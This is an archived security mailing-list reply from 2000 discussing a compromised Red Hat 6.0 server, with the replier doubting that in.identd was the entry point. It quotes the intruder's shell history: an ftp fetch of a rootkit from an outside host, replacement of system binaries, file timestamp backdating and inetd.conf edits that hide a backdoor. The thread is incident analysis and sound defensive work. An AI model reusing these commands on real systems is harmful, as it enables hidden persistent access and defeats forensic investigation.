|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: Rooted through in.identd on Red Hat 6.0
From: jms (sec
ORGONE.NEGATION.NET)Date: Thu Apr 20 2000 - 02:31:46 CDT
- Next message: Dmitry Alyabyev: "Re: Rooted through in.identd on Red Hat 6.0"
- Previous message: Bryan Seitz: "Re: CGI scans from Strauss.udel.edu -- They're back"
- Next in thread: Dmitry Alyabyev: "Re: Rooted through in.identd on Red Hat 6.0"
- Maybe reply: jms: "Re: Rooted through in.identd on Red Hat 6.0"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
what other services were running?
im more inclined to think they gained entry through other means, trojaned
the box, then came in again to clean up the logs and forgot to nuke
the .bash_history.
the in.identd entries are explained by his ftp session, which was probably
to get the rootkit:
ftp 200.192.58.201 21 <-- from .bash_history
^^^^^^^^^^^^^^
Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201
^^^^^^^^^^^^^^
..from syslogs.
supply a list of daemons running at the time of the breakin, i suspect we
will see something known to be rootable.
-jason storm
jmsnegation.net
/* hard work never killed noboby,
but i aint takin no chances. */
> Hi,
>
> A client was hacked last week by what looked like a buffer
> overflow through in.identd. This was on a Red Hat 6.0
> box.
>
> RH don't have any current security notices or fixes for
> in.identd on their servers, and I haven't seen other
> boxes hacked through in.identd recently.
>
> The hacker left the usual trace in /.bash_history, which
> ran like:
>
> mkdir /usr/lib/... ; cd /usr/lib/...
> ftp 200.192.58.201 21
> cd /usr/lib/...
> mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz?
> pstree.gz;
> mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz?
> syslogd.gz;
> mv tcpd.gz? tcpd.gz
> gzip -d *
> chmod +x *
> mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv
> syslogd /usr/sbin;
> mv pt07 /usr/lib/; mv pstree /usr/bin ;
> /usr/lib/pt07
> echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220
> ;
> echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ;
> echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220
> ;
> echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
> touch -t 199910122110 /dev/cui220
> touch -t 199910122110 /dev/cui221
> touch -t 199910122110 /usr/lib/pt07
> touch -t 199910122110 /usr/sbin/syslogd
> touch -t 199910122110 /usr/sbin/tcpd
> touch -t 199910122110 /bin/ps
> touch -t 199910122110 /bin/netstat
> touch -t 199910122110 /usr/bin/pstree
> cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
> mv /tmp/b /etc/inetd.conf
> killall -HUP inetd
>
> ... installing a back door and a partial cover of tracks.
>
> The only messages in /var/log/messages around the time
> were:
>
> Apr 8 23:15:57 home identd[12006]: Connection from
> 200.192.58.201
> Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 (
> 200.192.58.201 ) for: 1176, 21
> Apr 8 23:16:05 home identd[12007]: Connection from
> 200.192.58.201
> Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 (
> 200.192.58.201 ) for: 1176, 21
>
> ... the IP address traces back to somewhere in Brazil.
>
> Anyone know of any current bug notices, exploits, or
> patches for in.identd?
>
> Del
>
- Next message: Dmitry Alyabyev: "Re: Rooted through in.identd on Red Hat 6.0"
- Previous message: Bryan Seitz: "Re: CGI scans from Strauss.udel.edu -- They're back"
- Next in thread: Dmitry Alyabyev: "Re: Rooted through in.identd on Red Hat 6.0"
- Maybe reply: jms: "Re: Rooted through in.identd on Red Hat 6.0"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]